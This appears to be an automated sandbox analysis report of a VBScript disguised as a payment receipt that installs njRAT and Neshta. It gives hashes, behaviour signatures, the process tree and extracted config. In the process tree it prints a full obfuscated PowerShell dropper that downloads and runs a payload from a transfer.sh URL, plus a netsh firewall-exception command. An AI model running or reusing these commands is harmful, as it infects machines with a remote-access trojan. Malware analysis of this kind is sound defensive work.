Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    05-01-2022 08:22

General

  • Target

    7H2B1N27_PAYMENT_RECEIPT.vbs

  • Size

    2KB

  • MD5

    1cf9e3a75322042644a95e4d9eb359bc

  • SHA1

    27469cadb09a071e5ee98e6a6492bf1ee16bd170

  • SHA256

    7ad872e2d279268cc3107a90337b4beb3be0fc888668d60e6995d64b8955b2e6

  • SHA512

    a97d371a84e9ec64821022d64439ac6b04befe0fc2b4231b721450cbc12d70cc3232a53df936a4158e8c5e380c66ef6d1dff66aff4c0b5909652b3dc4f7a41ad

Malware Config

Extracted

  • Language
    ps1 (deobfuscated)
  • URLs (ps1.dropper)
    https://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txt

Extracted

  • Family
    njrat
  • Version
    1.9
  • Botnet
    HacKed
  • Attributes
    reg_key: Microsoft.Exe

Signatures 15

  • Detect Neshta Payload ⋅ 3 IoCs
  • Modifies system executable filetype association ⋅ 2 TTPs 1 IoCs
  • Neshta

    Malware from the Neshta family infects other executable files in order to spread itself and cause damage.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request ⋅ 1 IoCs
  • Modifies Windows Firewall ⋅ 1 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext ⋅ 2 IoCs
  • Drops file in Program Files directory ⋅ 53 IoCs
  • Drops file in Windows directory ⋅ 1 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class ⋅ 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 3 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 12 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 24 IoCs

Processes 5

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7H2B1N27_PAYMENT_RECEIPT.vbs"
    Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &((gv '*MDR*').naMe[3,11,2]-joIN'') ( (('(0PG (Rd9&(Lz0PG+0PGS{0'+'PG+0PG0}Rd9+Rd0PG+0'+'PG9{1}LzRd0PG+0PG9+Rd0PG+0PG9S0PG+0PG-fRd9+Rd9X'+'EzIR0PG+0PGd0PG+0PG9'+'+R0PG+0PGd9EXEz,XEzR'+'d9'+'+Rd9XXEz)(.R0PG+0PGd0PG+0PG9+Rd9(0PG+0PGLRd9+Rd9z0PG+0PGS{10PG+0PG}{0}R0PG+0PGd9+R0PG+0PGd90PG+0PG{20PG+0PG}LzS -R0PG+0PGd90PG+0PG+Rd90PG+0PGfXERd0PG+0PG90PG+0PG+Rd0PG'+'+0PG9zORd9+Rd9bXEz,(LR0PG+0PGd0PG+0PG9+Rd90PG+0PGzS{1}0PG+0PGRd90PG+0PG+0PG+0PGR0PG+0PGd9{0Rd9+Rd9}LzS 0PG+0PG-f'+'Rd9+Rd9 0PG+0PGRd9+Rd90PG+0PGXEz0PG+0PGw-Rd9+0P'+'G+0PGRd9XEz,XE0PG+0PGz0PG+0PGRd0'+'PG+0PG9+R'+'d9N0PG+0PGeXEz)Rd9+Rd90PG+0PG,(0PG+0PGLz0PG+0PGS{0}{1R0PG+0PGd0PG+0PG9+Rd9}Rd9+Rd90PG+0PGLz0PG+0PGS-Rd9+Rd0PG+0PG9fXEz0PG+0PGjeXE0PG+0PGz0PG+0PG,XEzRd0PG+0PG9+Rd0PG+0PG9ctX0PG+0PGEz)) (LzS{2Rd90PG+0PG+R0PG+0PGd90PG'+'+0PG}{0}0PG+0PG{'+'0PG+0PG1Rd9+Rd9}LzSRd9+0PG+0PGRd0PG+0PG9-fRd9+Rd9 R'+'d90PG+0PG+Rd9(Lz0PG+0PGRd9+Rd0PG+0PG9S{1}{0}{0PG+0PG2Rd0PG+0PG90PG+0PG+R0PG+0PGd9}Rd9+Rd9LzS 0PG+0PG-f Rd9+Rd9XRd9+Rd9EzbCl0PG+0PGXEz,XEz.W0PG+0PGe0PG+0PGXR'+'d'+'9+Rd9ERd90PG+0PG+R0PG+0PGd90PG+0PGz,XEz0PG+0PGiX0PG+0PGEz)0PG+0PG,R0PG+0PGd9+Rd9XERd9+R0PG+0PGd9ze0PG+0PGntXEz,X0PG+0PGR0PG+0PGd9+R0PG+0PGd9EzNetXEz'+')).0PG+0PG(L0PG+0PGRd9+Rd9zRd90P'+'G+0PG+Rd90PG+0P'+'GS{Rd0PG+0PG90PG+0PG+Rd0PG+0PG90}{2Rd9+0PG'+'+0PGRd'+'9}0PG+0PG{3}{0PG+0PG1}{40PG+0PG}LRd90PG+0PG+Rd9zSRd9+Rd9 0PG+0PG-f XE0PG+0PGzDXERd9+Rd9z,Rd9+R0PG+0PGd9XEzdstXEz'+',XE0PG+0PGzow0PG+0PGnXERd'+'9+R0PG+0PGd9z,R0PG+0PGd9+0PG+0PGR0PG+0PGd90PG+0PGXEzloaXER0PG+0PGd90P'+'G'+'+0PG+Rd90PG+0PGz,(LRd0PG+0PG9+0P'+'G+0PGRd9z0PG+0PGRd9+Rd9S0PG+0PG{0}{1}LzRd9+Rd0PG+0PG9S 
-Rd9+0PG+0PGRd9fRd0PG'+'+0PG9+R'+'d9XEzrRd9'+'+R0PG+0PGd9iXEz,0PG+0PGX0'+'PG+0PGEzn0PG+0PGgXEz0PG+0PGRd9+Rd90'+'PG+0PG)).LRd9+Rd9'+'zSINRd9+Rd0PG+0PG9vOLGykERd9+Rd9'+'LzS(0PG+0'+'PGXEzhttps://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txtX0PG+0PGRd9+Rd9Ez)Rd0PG+0PG90PG+0PG).rEp'+'l0PG+0P'+'GacE(Rd9LGyRd9'+',0PG+0PGR0PG+0PGd9tYaRd0PG+0PG9).rEplacE(([cHaR]76+0PG+0PG[cHaR]122+[0PG+0PGcHaR0PG+0PG]0PG+0PG83),[STrinG]0PG+0PG[0PG+0PGc'+'HaR]34)0PG+0PG.rEplacE(([cHaR]80PG+0PG8+[cHaR]60PG+0PG9+[cHaR]120PG+0PG2),[0PG+0PGSTr'+'inG][cHa0PG+0PGR]30PG+0PG9)0c0PG'+'+0PGoIn0PG+0PGVo0PG+0PGkE-E0PG+0PGxpre'+'sSi0PG+0PGo0PG+0PGN0PG).rEplaCe(0PGRd90PG,[sTrIng][CHar]39).rEplaCe(0PG0co0PG,0PGvKO0PG).rEplaCe(([CHar'+']116+[CHar]89+[CHar]97),[sTrIng][CHar]96)vKO .( kSfEnV:COmspeC[4,24,25]-jOIN0'+'PG0PG)') -replace ([CHaR]118+[CHaR]75+[CHaR]79),[CHaR]124-crEpLace([CHaR]48+[CHaR]80+[CHaR]71),[CHaR]39 -replace 'kSf',[CHaR]36))
      Blocklisted process makes network request
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Modifies system executable filetype association
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        PID:1324
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1044
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
          PID:4040

Network

MITRE ATT&CK Matrix

  • Collection
  • Command and Control
  • Credential Access
  • Defense Evasion
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Privilege Escalation

Downloads

  • C:\Users\ALLUSE~1\Genetor\MICROS~1.EXE
    MD5
    1e98e92a982af948ee18ee819a2d8ad1
    SHA1
    6cb0bd87815118351e5e32c50b434079dfba255c
    SHA256
    235d3f96a78ce2dad584e6eb1a25fc386b3ae5e332c4d3c56f03b0a4978be778
    SHA512
    6711de2e00462c49852cee03fd8ef720310c4ffa5b3a653c08f2913a6146974f28b8a3b3ff38b3097310852a5aa3b964b77945bcefef3856911eb9acd0e42c6f
